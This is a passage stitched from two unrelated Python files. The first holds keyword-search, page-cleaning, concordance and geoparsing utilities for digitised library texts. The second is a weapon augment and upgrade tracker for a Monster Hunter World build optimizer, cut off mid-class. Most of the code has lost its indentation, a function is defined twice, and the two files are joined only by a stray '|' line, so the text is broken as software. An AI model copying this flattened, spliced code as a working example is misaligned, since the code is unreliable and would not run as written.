match = (title, edition, archive, filename, text, keysentence)
matches.append(match)
return matches
def get_page_matches(document,
keywords,
preprocess_type=PreprocessWordType.NORMALIZE):
"""
Get pages within a document that include one or more keywords.
For each page that includes a specific keyword, add a tuple of
form:
(<YEAR>, <DOCUMENT>, <PAGE>, <KEYWORD>)
If a keyword occurs more than once on a page, there will be only
one tuple for the page for that keyword.
If more than one keyword occurs on a page, there will be one tuple
per keyword.
:param document: document
:type document: defoe.nls.document.Document
:param keywords: keywords
:type keywords: list(str or unicode:
:param preprocess_type: how words should be preprocessed
(normalize, normalize and stem, normalize and lemmatize, none)
:type preprocess_type: defoe.query_utils.PreprocessWordType
:return: list of tuples
:rtype: list(tuple)
"""
matches = []
for keyword in keywords:
for page in document:
match = None
for word in page.words:
preprocessed_word = query_utils.preprocess_word(
word, preprocess_type)
if preprocessed_word == keyword:
match = (document.year, document, page, keyword)
break
if match:
matches.append(match)
continue # move to next page
return matches
def get_document_keywords(document,
keywords,
preprocess_type=PreprocessWordType.NORMALIZE):
"""
Gets the list of keywords occurring within a document.
:param document: document
:type document: defoe.nls.document.Document
:param keywords: keywords
:type keywords: list(str or unicode)
:param preprocess_type: how words should be preprocessed
(normalize, normalize and stem, normalize and lemmatize, none)
:type preprocess_type: defoe.query_utils.PreprocessWordType
:return: sorted list of keywords that occur within article
:rtype: list(str or unicode)
"""
matches = set()
for page in document:
for word in page.words:
preprocessed_word = query_utils.preprocess_word(word,
preprocess_type)
if preprocessed_word in keywords:
matches.add(preprocessed_word)
return sorted(list(matches))
def document_contains_word(document,
keyword,
preprocess_type=PreprocessWordType.NORMALIZE):
"""
Checks if a keyword occurs within a document.
:param document: document
:type document: defoe.nls.document.Document
:param keyword: keyword
:type keyword: str or unicode
:param preprocess_type: how words should be preprocessed
(normalize, normalize and stem, normalize and lemmatize, none)
:type preprocess_type: defoe.query_utils.PreprocessWordType
:return: True if the document contains the word, False otherwise
:rtype: bool
"""
for page in document:
for word in page.words:
preprocessed_word = query_utils.preprocess_word(word,
preprocess_type)
if keyword == preprocessed_word:
return True
return False
def calculate_words_within_dictionary(page,
preprocess_type=PreprocessWordType.NORMALIZE):
"""
Calculates the percentage of page words found in a dictionary, used as a page quality (pc) measure.
Page words are normalized.
:param page: Page
:type page: defoe.nls.page.Page
:param preprocess_type: how words should be preprocessed
(normalize, normalize and stem, normalize and lemmatize, none)
:return: percentage of words found in the dictionary, as a string
:rtype: str
"""
dictionary = words.words()
counter= 0
total_words= 0
for word in page.words:
preprocessed_word = query_utils.preprocess_word(word, preprocess_type)
if preprocessed_word!="":
total_words += 1
if preprocessed_word in dictionary:
counter += 1
try:
calculate_pc = str(counter*100/total_words)
except ZeroDivisionError:
calculate_pc = "0"
return calculate_pc
def calculate_words_confidence_average(page):
"""
Calculates the average word confidence (wc) within a page.
:param page: Page
:type page: defoe.nls.page.Page
:return: average word confidence as a string
:rtype: str
"""
counter= 0
total_wc= 0
for wc in page.wc:
total_wc += float(wc)
try:
calculate_wc = str(total_wc/len(page.wc))
except ZeroDivisionError:
calculate_wc = "0"
return calculate_wc
def get_page_as_string(page,
preprocess_type=PreprocessWordType.LEMMATIZE):
"""
Return a page as a single string.
:param page: Page
:type page: defoe.nls.Page
:param preprocess_type: how words should be preprocessed
(normalize, normalize and stem, normalize and lemmatize, none)
:type preprocess_type: defoe.query_utils.PreprocessWordType
:return: page words as a string
:rtype: string or unicode
"""
page_string = ''
for word in page.words:
preprocessed_word = query_utils.preprocess_word(word,
preprocess_type)
if page_string == '':
page_string = preprocessed_word
else:
page_string += (' ' + preprocessed_word)
return page_string
def clean_page_as_string(page):
"""
Clean a page as a single string.
Handles hyphenated words (re-joining words split across lines, splitting run-together words) and fixes the long-s.
:param page: Page
:type page: defoe.nls.Page
:return: clean page words as a string
:rtype: string or unicode
"""
page_string = ''
for word in page.words:
if page_string == '':
page_string = word
else:
page_string += (' ' + word)
page_separated = page_string.split('- ')
page_combined = ''.join(page_separated)
if (len(page_combined) > 1) and ('f' in page_combined):
page_clean = longsfix_sentence(page_combined)
else:
page_clean= page_combined
page_final=page_clean.split()
page_string_final = ''
for word in page_final:
if "." not in word:
separated_str = re.sub(r'([a-z](?=[A-Z])|[A-Z](?=[A-Z][a-z]))', r'\1 ', word)
else:
separated_str = word
if page_string_final == '':
page_string_final = separated_str
else:
page_string_final += (' ' + separated_str)
return page_string_final
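def _example_clean_page_as_string():
    """
    Illustrative helper (not used by any defoe query): shows the hyphen
    re-joining and camel-case splitting that clean_page_as_string applies,
    using a minimal stand-in for a defoe.nls.Page object.
    """
    class _FakePage(object):
        words = ["hyphen-", "ated", "word", "runTogether"]
    # "hyphen- ated" is re-joined to "hyphenated" and "runTogether" is split
    # into "run Together"; returns "hyphenated word run Together"
    return clean_page_as_string(_FakePage())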
def preprocess_clean_page(clean_page,
preprocess_type=PreprocessWordType.LEMMATIZE):
clean_list = clean_page.split(' ')
page_string = ''
for word in clean_list:
preprocessed_word = query_utils.preprocess_word(word,
preprocess_type)
if page_string == '':
page_string = preprocessed_word
else:
page_string += (' ' + preprocessed_word)
return page_string
def get_sentences_list_matches(text, keysentence):
"""
Check which key-sentences occur within a string
and return the list of matches.
:param text: text
:type text: str or unicode
:param keysentence: key-sentences
:type keysentence: list(str or unicode)
:return: sorted list of matching sentences
:rtype: list(str or unicode)
"""
match = []
text_list= text.split()
for sentence in keysentence:
if len(sentence.split()) > 1:
if sentence in text:
count = text.count(sentence)
for i in range(0, count):
match.append(sentence)
else:
pattern = re.compile(r'^%s$'%sentence)
for word in text_list:
if re.search(pattern, word):
match.append(sentence)
return sorted(match)
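def _example_sentences_list_matches():
    """
    Illustrative helper (not used by any defoe query): shows the intended
    behaviour of get_sentences_list_matches on a hypothetical text.
    Multi-word key-sentences are counted as substrings; single-word
    key-sentences are matched token by token.
    """
    text = "the river clyde flows past the clyde valley"
    keysentences = ["river clyde", "valley"]
    # returns ['river clyde', 'valley']
    return get_sentences_list_matches(text, keysentences)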
def preprocess_clean_page_spacy(clean_page,
preprocess_type=PreprocessWordType.LEMMATIZE):
clean_list = clean_page.split(' ')
page_string = ''
for word in clean_list:
preprocessed_word = query_utils.preprocess_word(word,
preprocess_type)
if page_string == '':
page_string = preprocessed_word
else:
page_string += (' ' + preprocessed_word)
return page_string
def preprocess_clean_page_spacy(clean_page):
nlp = spacy.load('en')
doc = nlp(clean_page)
page_nlp_spacy=[]
for i, word in enumerate(doc):
word_normalized=re.sub(NON_AZ_REGEXP, '', word.text.lower())
output="%d\t%s\t%s\t%s\t%s\t%s\t%s\t"%( i+1, word, word_normalized, word.lemma_, word.pos_, word.tag_, word.ent_type_)
page_nlp_spacy.append(output)
return page_nlp_spacy
def georesolve_page_2(text, lang_model):
#print("---> Clean_Text to analyse %s" %text)
nlp = spacy.load(lang_model)
doc = nlp(text)
#print("---> DOC -NLP to analyse %s" %doc)
if doc.ents:
flag,in_xml = xml_geo_entities(doc)
if flag == 1:
geo_xml=georesolve_cmd(in_xml)
dResolved_loc= coord_xml(geo_xml)
#print("ROSA-3- My final result %s" % dResolved_loc)
return dResolved_loc
else:
return {}
else:
return {}
def georesolve_page(doc):
if doc.ents:
flag,in_xml = xml_geo_entities(doc)
if flag == 1:
geo_xml=georesolve_cmd(in_xml)
dResolved_loc= coord_xml(geo_xml)
return dResolved_loc
else:
return {}
else:
return {}
def geoparser_page(text):
geo_xml=geoparser_cmd(text)
dResolved_loc= geoparser_coord_xml(geo_xml)
return dResolved_loc
def geomap_page(doc):
geomap_html = ''
if doc.ents:
flag,in_xml = xml_geo_entities(doc)
if flag == 1:
geomap_html=geomap_cmd(in_xml)
#return str(geomap_html)
return geomap_html
def get_articles_nls(text):
text_list= text.split()
terms_view=[s.isupper() for s in text_list]
latin_view=[s in words.words() for s in text_list]
num_words= len(terms_view)
articles_page={}
if num_words > 10:
key='previous_page'
articles_page[key]=''
half_key=''
latin_key=''
cont = 0
repeated_key={}
for i in range(0, len(terms_view)):
flag = 0
word= text_list[i].split(",")[0]
#term in uppercase
#print("Studyng: %s - current key: %s, current half_key: %s, current lating_key: %s, current text in the key: %s" %(text_list[i], key, half_key, latin_key, articles_page[key]))
if terms_view[i]:
# UPPERCASE WITHOUT COMMA
if ',' not in text_list[i]:
#ACQUIENTANDIS plegiis, - managing ACQUIETANDIS - normally uppercase in latin too.
# EXCLUDING N. W. of Genova
if (not latin_view[i]) and ('.' not in text_list[i]):
if (i< num_words -1):
#checking that the next one is lower case - e.g. pleggis
#print("Importante: Palabra: %s, Capital de la siguiente %s, Latin de la siguiente %s" %(text_list[i], terms_view[i+1], latin_view[i+1]))
if (not terms_view[i+1]):
if (not latin_view[i+1]) or (text_list[i+1] == "de"):
latin_key= latin_key + text_list[i]
#print("Actualizando latin key %s" %(latin_key))
else:
half_key = half_key + text_list[i]
#print("Entro-0 a guardar half_key %s" % half_key)
else:
half_key = half_key + text_list[i]
#print("Entro-1 a guardar half_key %s" % half_key)
#See ZEUS. - managing ZEUS.
elif ("." in text_list[i]) and ('See' == text_list[i-1]):
articles_page[key]= articles_page[key] + ' ' + text_list[i]
# ABACISCUS. See ABACUS. - Managing ABACISCUS.
elif ("." in text_list[i]):
if (i< num_words -1):
#checking that the next one is See
if ("See" == text_list[i+1]):
word= text_list[i].split(".")[0]
key = word
# Managing key repetitions
if key in articles_page.keys():
repeated_key[key] += 1
key=key+"-"+str(repeated_key[key])
else:
repeated_key[key] = 0
# Updating the articles dictionary with the new key
articles_page[key] = ''
#ignoring the header of the first page - second half
if(half_key == "DCOMPLETEONARYFCIENCE"):
half_key=''
# AB ACO, - recording AB (of AB ACO,)
else:
half_key=half_key+text_list[i]
#print("Entro-2 a guardar half_key %s" % half_key)
#UPPERCASE WITH COMMA
else:
# AATTER, or AT TER - managing TER,
if ('or' == text_list[i-1]) or ('or' == text_list[i-2] and terms_view[i-1]):
if half_key!='':
articles_page[key]= articles_page[key] + ' ' + half_key + ' ' + text_list[i]
half_key = ''
else:
articles_page[key]= articles_page[key] + ' ' + text_list[i]
#print("!Entro en - or UPPERCASE,- : key %s - text %s:" %(key, articles_page[key]))
#See ASTRONOMY, - managing ASTRONOMY,
elif ('See' == text_list[i-1]):
articles_page[key]= articles_page[key] + ' ' + text_list[i]
else:
# AB ACO, - recording ACO, (of AB ACO,)
# key= ABACO,
if half_key!='':
key=half_key + word
half_key=''
flag = 1
else:
# double A, but - avoid creating a new key when an UPPERCASE, term follows "but"
if (i < num_words -1):
if text_list[i+1] == "but":
articles_page[key]= articles_page[key] + ' ' + text_list[i]
# RECORDING THE KEY, in the normal case
else:
key=word
flag = 1
# RECORDING THE KEY, in the normal case
else:
key = word
flag = 1
#DEALING WITH THE FIRST PAGE
if key == "SABAA":
key=word[-2:]
flag = 1
if flag == 1 :
#print(" Entro cuando encuentra nueva key: %s" % key)
# Managing key repetitions
if key in articles_page.keys():
repeated_key[key] += 1
key=key+"-"+str(repeated_key[key])
else:
repeated_key[key] = 0
#Updating the articles dictionary with the new key
articles_page[key] = ''
#term in lowercase
else:
#UpperCase in the middle of the text
##ACQUIETANDIS plegiis, - managing plegiis,
if latin_key!='':
if ',' in text_list[i]:
key=latin_key+ " " +word
articles_page[key]= ''
latin_key=''
# ACQUIETANTIA de Jhiris et hundredh, - managing several latin terms before the last one with comma.
else:
latin_key= latin_key + " " + text_list[i]
elif half_key!='':
if (half_key != "ANEWADICTI"):
articles_page[key]= articles_page[key] + ' ' + half_key + ' ' + text_list[i]
#print("Entro para darle el half_key %s al articles_page[%s]:%s" %(half_key, key, articles_page[key]))
half_key=''
elif articles_page[key] != '' :
articles_page[key]= articles_page[key] + ' ' + text_list[i]
else:
articles_page[key]= text_list[i]
# deleting empty keys:
empty_keys = [k for k,v in articles_page.items() if not v]
for k in empty_keys:
del articles_page[k]
return articles_page
def get_text_keyword_idx(text,
keywords):
"""
Gets a list of keywords (and their position indices) within an
article.
:param text: text
:type text: string
:param keywords: keywords
:type keywords: list(str or unicode)
:return: sorted list of keywords and their indices
:rtype: list(tuple(str or unicode, int))
"""
text_list= text.split()
matches = set()
for idx, word in enumerate(text_list):
if word in keywords:
match = (word, idx)
matches.add(match)
return sorted(list(matches))
def get_concordance(text,
keyword,
idx,
window):
"""
For a given keyword (and its position in an article), return
the concordance of words (before and after) using a window.
:param text: text
:type text: string
:param keyword: keyword
:type keyword: str or unicode
:param idx: keyword index (position) in list of article's words
:type idx: int
:window: number of words to the right and left
:type: int
:return: concordance
:rtype: list(str or unicode)
"""
text_list= text.split()
text_size = len(text_list)
if idx >= window:
start_idx = idx - window
else:
start_idx = 0
if idx + window >= text_size:
end_idx = text_size
else:
end_idx = idx + window + 1
concordance_words = []
for word in text_list[start_idx:end_idx]:
concordance_words.append(word)
return concordance_words
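# A minimal usage sketch of the two helpers above (not part of the original module;
# the sample text and keywords are made up for illustration).
def _concordance_example():
    sample = "the abbot granted the manor to the abbot of the priory"
    hits = get_text_keyword_idx(sample, ["abbot", "manor"])
    # hits == [('abbot', 1), ('abbot', 7), ('manor', 4)]
    for keyword, idx in hits:
        # e.g. for ('abbot', 1) with window=2 this prints ['the', 'abbot', 'granted', 'the']
        print(keyword, get_concordance(sample, keyword, idx, window=2))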
|
# -*- coding: ascii -*-
"""
Filename: query_weapons.py
Author: <EMAIL>
This file provides the MHWI build optimizer script's weapon database queries.
"""
import json
import logging
from abc import ABC, abstractmethod
from collections import namedtuple
from itertools import accumulate, product, zip_longest
from enum import Enum, auto
from copy import copy
from .utils import prune_by_superceding
from .loggingutils import ExecutionProgress, dump_pruned_weapon_combos
from .database_skills import SetBonus
from .database_weapons import (SHARPNESS_LEVEL_NAMES,
MaximumSharpness,
WeaponAugmentationScheme,
WeaponUpgradeScheme,
weapon_db)
logger = logging.getLogger(__name__)
WeaponAugmentsContribution = namedtuple(
"WeaponAugmentsContribution",
[
"added_attack_power",
"added_raw_affinity",
"extra_decoration_slot_level",
],
)
class WeaponAugmentTracker(ABC):
@classmethod
def get_instance(cls, weapon):
#assert isinstance(weapon, namedtuple) # TODO: Make a proper assertion.
if weapon.augmentation_scheme is WeaponAugmentationScheme.ICEBORNE:
return IBWeaponAugmentTracker(weapon.rarity)
elif weapon.augmentation_scheme is WeaponAugmentationScheme.NONE:
return NoWeaponAugments()
else:
raise RuntimeError(f"Augmentation scheme {weapon.augmentation_scheme} not supported.")
@classmethod
def get_maximized_trackers(cls, weapon, *, health_regen_minimum):
trackers = []
bare_tracker = cls.get_instance(weapon)
for config_obj in bare_tracker.get_maximized_configs(health_regen_minimum=health_regen_minimum):
tracker = cls.get_instance(weapon)
tracker.update_with_config(config_obj)
trackers.append(tracker)
return trackers
# TODO: Use something better, like the __copy__() method.
@abstractmethod
def copy(self):
raise NotImplementedError
# Outputs some arbitrary structure.
#
# This function is only really intended for diagnostic purposes for now, but will be given more important roles
# later. I'll properly define the structure then.
@abstractmethod
def get_config(self):
raise NotImplementedError
# Similar to get_config(), but this returns an arbitrary string that the class can read to restore to the same augments.
@abstractmethod
def get_serialized_config(self):
raise NotImplementedError
# Gives back a WeaponAugmentsContribution namedtuple with all the values the current
# set of augments contributes to the build.
@abstractmethod
def calculate_contribution(self):
raise NotImplementedError
# Gives back a list of arbitrary things describing all the possible maximum configurations.
# You can pass one of these things to update_with_config.
#
# health_regen_minimum is the minimum level we need it to be.
@abstractmethod
def get_maximized_configs(self, health_regen_minimum=0):
raise NotImplementedError
# Set the config to the selected config.
@abstractmethod
def update_with_config(self, selected_config):
raise NotImplementedError
# Similar to update_with_config(), but you get a string returned by get_serialized_config().
@abstractmethod
def update_with_serialized_config(self, serialized_config):
raise NotImplementedError
# Returns a one-line string that represents the state of the tracker.
# Mostly targeted for debugging purposes.
@abstractmethod
def to_str_debugging(self):
raise NotImplementedError
class NoWeaponAugments(WeaponAugmentTracker):
MAGIC_WORD = "NoWeaponAugments"
def copy(self):
return self # It shouldn't matter at all
def get_config(self):
return []
def get_serialized_config(self):
return self.MAGIC_WORD
def calculate_contribution(self):
ret = WeaponAugmentsContribution (
added_attack_power = 0,
added_raw_affinity = 0,
extra_decoration_slot_level = 0,
)
return ret
def get_maximized_configs(self, health_regen_minimum=0):
if health_regen_minimum > 0:
return [] # Not possible to add health regen, so there are no valid configs.
else:
return None
def update_with_config(self, selected_config):
raise RuntimeError("Can't update the augments of a weapon that can't be augmented.")
def update_with_serialized_config(self, serialized_config):
assert serialized_config == self.MAGIC_WORD
return
def to_str_debugging(self):
return "Cannot augment this weapon."
class IBWeaponAugmentType(Enum):
AUGMENT_LEVEL = auto() # This one's not really an augment.
ATTACK_INCREASE = auto()
AFFINITY_INCREASE = auto()
#DEFENSE_INCREASE = auto() # I'm just gonna pretend these don't exist yet...
SLOT_UPGRADE = auto()
HEALTH_REGEN = auto()
#ELEMENT_STATUS_EFFECT_UP = auto()
class IBWeaponAugmentTracker(WeaponAugmentTracker):
__slots__ = [
"auto_maximize",
"_rarity",
"_aug_level",
"_augments",
]
IB_AUGMENTATION_SLOTS = {
10: [5, 7, 9, 10],
11: [4, 5, 6, 8 ],
12: [3, 4, 5, 6 ],
# 0 1 2 3 = slot level
}
IB_SLOT_CONSUMPTIONS = {
IBWeaponAugmentType.ATTACK_INCREASE : [3, 2, 2, 2],
IBWeaponAugmentType.AFFINITY_INCREASE : [2, 2, 2, 2],
#IBWeaponAugmentType.DEFENSE_INCREASE : [1, 1, 1, 2],
IBWeaponAugmentType.SLOT_UPGRADE : [3, 3, 1, 1],
IBWeaponAugmentType.HEALTH_REGEN : [3, 2, 2, 2],
#IBWeaponAugmentType.ELEMENT_STATUS_EFFECT_UP : [1, 2, 2, 2],
}
_IB_MAX_SLOT_LEVEL = 3 # This determines the maximum slot level, i.e. length of each IB_AUGMENTATION_SLOTS list.
_IB_AUGMENT_MAX_LEVEL = 4 # This determines the maximum level of each of the IBWeaponAugmentTypes.
IB_ATTACK_AUGMENT_VALUES = (0, 5, 5, 5, 5)
IB_AFFINITY_AUGMENT_VALUES_PERCENTAGES = (0, 10, 5, 5, 5)
# level = 0 1 2 3 4
IB_SLOT_CONSUMPTIONS_CUMULATIVE = {k: list(accumulate(v)) for (k, v) in IB_SLOT_CONSUMPTIONS.items()}
IB_ATTACK_AUGMENT_CUMULATIVE = tuple(accumulate(IB_ATTACK_AUGMENT_VALUES))
IB_AFFINITY_AUGMENT_PERCENTAGES_CUMULATIVE = tuple(accumulate(IB_AFFINITY_AUGMENT_VALUES_PERCENTAGES))
def __init__(self, rarity, auto_maximize=True):
assert isinstance(rarity, int)
assert isinstance(auto_maximize, bool)
if auto_maximize == False:
raise NotImplementedError("Only works with auto-maximize on for now.")
# To implement auto_maximize==False, we'd need to actually allow lower augment levels.
self._auto_maximize = auto_maximize
self._rarity = rarity
self._aug_level = self._IB_MAX_SLOT_LEVEL
self._augments = {} # {IBWeaponAugmentType: int}
assert self._state_is_valid()
return
def copy(self):
new = copy(self)
new._augments = copy(self._augments)
assert new._state_is_valid()
return new
def get_config(self):
return list(self._augments.items())
def get_serialized_config(self):
augments = {k.name: v for (k, v) in self._augments.items()}
data = {
"rarity": self._rarity,
"aug_level": self._aug_level,
"augments": augments,
}
serialized_data = json.dumps(data)
assert isinstance(serialized_data, str)
return serialized_data
def calculate_contribution(self):
attack_level = self._augments.get(IBWeaponAugmentType.ATTACK_INCREASE, 0)
affinity_level = self._augments.get(IBWeaponAugmentType.AFFINITY_INCREASE, 0)
decoration_slot_level = self._augments.get(IBWeaponAugmentType.SLOT_UPGRADE, 0)
ret = WeaponAugmentsContribution (
added_attack_power = \
self.IB_ATTACK_AUGMENT_CUMULATIVE[attack_level],
added_raw_affinity = \
self.IB_AFFINITY_AUGMENT_PERCENTAGES_CUMULATIVE[affinity_level],
extra_decoration_slot_level = \
decoration_slot_level,
)
return ret
def get_maximized_configs(self, health_regen_minimum=0):
maximized_configs = []
efr_augments = {
IBWeaponAugmentType.ATTACK_INCREASE,
IBWeaponAugmentType.AFFINITY_INCREASE,
IBWeaponAugmentType.SLOT_UPGRADE,
}
picks = [[(aug, x) for x in range(self._IB_AUGMENT_MAX_LEVEL + 1)] for aug in efr_augments]
# range() will go from 0 to 4. 0 will mean no augment, and 1-4 will be each level.
for augs in product(*picks):
config = [(aug, level) for (aug, level) in augs if (level > 0)]
assert IBWeaponAugmentType.HEALTH_REGEN not in set(x for (x, _) in config) # Assume it's not in yet.
if health_regen_minimum > 0:
config.append((IBWeaponAugmentType.HEALTH_REGEN, health_regen_minimum))
if self._is_valid_configuration(config, self._rarity, self._aug_level):
maximized_configs.append(config)
return maximized_configs
def update_with_config(self, selected_config):
assert isinstance(selected_config, list) # May accept dicts later.
#assert (selected_config in self.get_maximized_configs()) or (len(selected_config) == 0) # Fails if our config isn't maximized
assert all((level >= 0) and (level <= 4) for (augment, level) in selected_config)
self._augments = {augment: level for (augment, level) in selected_config}
assert len(self._augments) == len(selected_config) # Quick check if we have any duplicates.
assert self._state_is_valid() # If our config breaks anything, it should be caught here
return
def update_with_serialized_config(self, serialized_config):
assert isinstance(serialized_config, str)
data = json.loads(serialized_config)
# We check that we're updating the right tracker.
assert self._rarity == data["rarity"]
assert self._aug_level == data["aug_level"]
self._augments = {IBWeaponAugmentType[k]: v for (k, v) in data["augments"].items()}
assert self._state_is_valid()
return
def to_str_debugging(self):
return f"[Augmentation Level: {self._aug_level}] " + ",".join(f"{k.name}_{v}" for (k, v) in self._augments.items())
def _state_is_valid(self):
config_list = list(self._augments.items())
ret = all(isinstance(k, IBWeaponAugmentType) and isinstance(v, int) for (k, v) in self._augments.items()) \
and all((v >= 0) and (v <= 4) for (k, v) in self._augments.items()) \
and (IBWeaponAugmentType.AUGMENT_LEVEL not in self._augments.items()) \
and self._is_valid_configuration(config_list, self._rarity, self._aug_level)
return ret
@classmethod
def _is_valid_configuration(cls, config_list, rarity, aug_level):
assert isinstance(config_list, list)
assert all(isinstance(aug, IBWeaponAugmentType) and isinstance(level, int) for (aug, level) in config_list)
assert all((level >= 0) and (level <= cls._IB_AUGMENT_MAX_LEVEL) for (_, level) in config_list)
assert len(config_list) == len(set(x for (x, _) in config_list))
slots_maximum = cls.IB_AUGMENTATION_SLOTS[rarity][aug_level]
slots_used = 0
for (aug, level) in config_list:
if level > 0:
slots_used += cls.IB_SLOT_CONSUMPTIONS_CUMULATIVE[aug][level - 1]
# IMPORTANT: Need to remember that the slot consumptions list starts at level 1.
if slots_used <= slots_maximum:
return True
else:
return False
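# Worked example (hypothetical numbers, for illustration only): a rarity-10 weapon at
# augmentation level 3 has IB_AUGMENTATION_SLOTS[10][3] == 10 slots available. The config
# [(ATTACK_INCREASE, 2), (SLOT_UPGRADE, 1)] consumes
# IB_SLOT_CONSUMPTIONS_CUMULATIVE[ATTACK_INCREASE][1] + IB_SLOT_CONSUMPTIONS_CUMULATIVE[SLOT_UPGRADE][0]
# == 5 + 3 == 8 slots, so _is_valid_configuration() accepts it.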
WeaponUpgradesContribution = namedtuple(
"WeaponUpgradesContribution",
[
"added_attack_power",
"added_raw_affinity",
"extra_decoration_slot_level",
"new_max_sharpness_values",
"set_bonus",
],
)
class WeaponUpgradeTracker(ABC):
@classmethod
def get_instance(cls, weapon):
#assert isinstance(weapon, namedtuple) # TODO: Make a proper assertion.
if weapon.upgrade_scheme is WeaponUpgradeScheme.ICEBORNE_COMMON:
return IBCWeaponUpgradeTracker()
elif weapon.upgrade_scheme is WeaponUpgradeScheme.SAFI_STANDARD:
return SafiWeaponUpgrades()
elif weapon.upgrade_scheme is WeaponUpgradeScheme.NONE:
return NoWeaponUpgrades()
else:
raise RuntimeError(f"Upgrade scheme {weapon.upgrade_scheme} not supported.")
# TODO: Consider pruning configurations that are clearly inferior, rather than just removing
# configurations with duplicate contributions.
@classmethod
def get_maximized_trackers_pruned(cls, weapon):
trackers = []
seen_tracker_contributions = set()
bare_tracker = cls.get_instance(weapon)
for config_obj in bare_tracker.get_maximized_configs():
tracker = cls.get_instance(weapon)
tracker.update_with_config(config_obj)
contribution = tracker.calculate_contribution()
if contribution not in seen_tracker_contributions:
seen_tracker_contributions.add(contribution)
trackers.append(tracker)
return trackers
# TODO: Use something better, like the __copy__() method.
@abstractmethod
def copy(self):
raise NotImplementedError
# Similar to WeaponAugmentTracker
@abstractmethod
def get_config(self):
raise NotImplementedError
# Similar to WeaponAugmentTracker
@abstractmethod
def get_serialized_config(self):
raise NotImplementedError
# Similar to WeaponAugmentTracker
@abstractmethod
def calculate_contribution(self):
raise NotImplementedError
# Similar to WeaponAugmentTracker
@abstractmethod
def get_maximized_configs(self):
raise NotImplementedError
# Similar to WeaponAugmentTracker
@abstractmethod
def update_with_config(self, selected_config):
raise NotImplementedError
# Similar to WeaponAugmentTracker
@abstractmethod
def update_with_serialized_config(self, serialized_config):
raise NotImplementedError
# Similar to WeaponAugmentTracker
@abstractmethod
def to_str_debugging(self):
raise NotImplementedError
class NoWeaponUpgrades(WeaponUpgradeTracker):
MAGIC_WORD = "NoWeaponUpgrades"
def copy(self):
return self # It shouldn't matter at all
def get_config(self):
return []
def get_serialized_config(self):
return self.MAGIC_WORD
def calculate_contribution(self):
ret = WeaponUpgradesContribution (
added_attack_power = 0,
added_raw_affinity = 0,
extra_decoration_slot_level = 0,
new_max_sharpness_values = None,
set_bonus = None,
)
return ret
def get_maximized_configs(self):
return [None]
def update_with_config(self, selected_config):
if selected_config is not None:
raise RuntimeError("Can't update the upgrades of a weapon that can't be upgraded.")
return
def update_with_serialized_config(self, serialized_config):
assert serialized_config == self.MAGIC_WORD
def to_str_debugging(self):
return "Cannot upgrade this weapon."
class IBCWeaponUpgradeType(Enum):
ATTACK = auto()
AFFINITY = auto()
#ELEMENTAL_STATUS = auto() # I'm just gonna pretend these don't exist yet...
#DEFENSE = auto()
class IBCWeaponUpgradeTracker(WeaponUpgradeTracker):
__slots__ = [
"_upgrades",
]
_IB_ATTACK_UPGRADE_VALUES = (1, 1, 1, 1, 1, 1 , 2)
_IB_AFFINITY_UPGRADE_VALUES = (1, 1, 1, 1, 1, None, 3)
# level = 1 2 3 4 5 6 7
_m1 = [
[IBCWeaponUpgradeType.ATTACK] * 6,
([IBCWeaponUpgradeType.AFFINITY] * 1) + ([IBCWeaponUpgradeType.ATTACK] * 5),
([IBCWeaponUpgradeType.AFFINITY] * 2) + ([IBCWeaponUpgradeType.ATTACK] * 4),
([IBCWeaponUpgradeType.AFFINITY] * 3) + ([IBCWeaponUpgradeType.ATTACK] * 3),
([IBCWeaponUpgradeType.AFFINITY] * 4) + ([IBCWeaponUpgradeType.ATTACK] * 2),
([IBCWeaponUpgradeType.AFFINITY] * 5) + ([IBCWeaponUpgradeType.ATTACK] * 1),
]
_m2 = [
[IBCWeaponUpgradeType.ATTACK],
[IBCWeaponUpgradeType.AFFINITY],
]
# TODO: Consider automating this definition better.
_MAXIMIZED_CONFIGS = [(x + y) for (x, y) in product(_m1, _m2)]
def __init__(self):
self._upgrades = []
assert self._state_is_valid()
return
def copy(self):
new = copy(self)
new._upgrades = copy(self._upgrades)
assert new._state_is_valid()
return new
def get_config(self):
return copy(self._upgrades)
def get_serialized_config(self):
upgrades_strs = [(x.name if (x is not None) else None) for x in self._upgrades]
serialized_data = json.dumps(upgrades_strs)
assert isinstance(serialized_data, str)
return serialized_data
def calculate_contribution(self):
# IMPORTANT: We're actually mostly just relying on this function for debugging.
# If this function doesn't raise an exception, then we're good.
added_attack_power = 0
added_raw_affinity = 0
for (i, upgrade) in enumerate(self._upgrades):
assert i < len(self._IB_ATTACK_UPGRADE_VALUES)
if upgrade is IBCWeaponUpgradeType.ATTACK:
added_attack_power += self._IB_ATTACK_UPGRADE_VALUES[i]
elif upgrade is IBCWeaponUpgradeType.AFFINITY:
added_raw_affinity += self._IB_AFFINITY_UPGRADE_VALUES[i]
else:
raise RuntimeError("Unsupported upgrade type found: " + str(type(upgrade)))
ret = WeaponUpgradesContribution (
added_attack_power = added_attack_power,
added_raw_affinity = added_raw_affinity,
extra_decoration_slot_level = 0,
new_max_sharpness_values = None,
set_bonus = None,
)
return ret
def get_maximized_configs(self):
return self._MAXIMIZED_CONFIGS
def update_with_config(self, selected_config):
if selected_config is None:
self._upgrades = []
else:
assert isinstance(selected_config, list)
self._upgrades = selected_config
assert self._state_is_valid()
return
def update_with_serialized_config(self, serialized_config):
assert isinstance(serialized_config, str)
upgrades_strs = json.loads(serialized_config)
assert isinstance(upgrades_strs, list)
self._upgrades = [(IBCWeaponUpgradeType[x] if (x is not None) else None) for x in upgrades_strs]
assert self._state_is_valid()
return
def to_str_debugging(self):
return ",".join(x.name for x in self._upgrades)
def _state_is_valid(self):
# We generally just rely on calculate_contribution() to raise exceptions when something's wrong.
return (len(self._upgrades) <= 7)
class SafiWeaponStandardUpgradeType(Enum):
ATTACK = auto()
AFFINITY = auto()
#STATUS = auto() # Will implement later.
#ELEMENT = auto() # Will implement later.
#DEFENSE = auto() # Will implement later.
SLOT = auto()
SHARPNESS = auto()
SafiWeaponSetBonusUpgradeTypeInfo = namedtuple("SafiWeaponSetBonusUpgradeTypeInfo", ["upgrade_name", "set_bonus_name"])
class SafiWeaponSetBonusUpgradeType(Enum):
TEOSTRA_ESSENCE = SafiWeaponSetBonusUpgradeTypeInfo("Teostra Essence", "TEOSTRA_TECHNIQUE")
TIGREX_ESSENCE = SafiWeaponSetBonusUpgradeTypeInfo("Tigrex Essence", "TIGREX_ESSENCE")
VELKHANA_ESSENCE = SafiWeaponSetBonusUpgradeTypeInfo("Velkhana Essence", "VELKHANA_DIVINITY")
# I'll add the others as I fill the database!
class SafiWeaponUpgrades(WeaponUpgradeTracker):
__slots__ = [
"_config",
]
# TODO: These values are true for GS according to honeyhunterworld.com. What about other weapons?
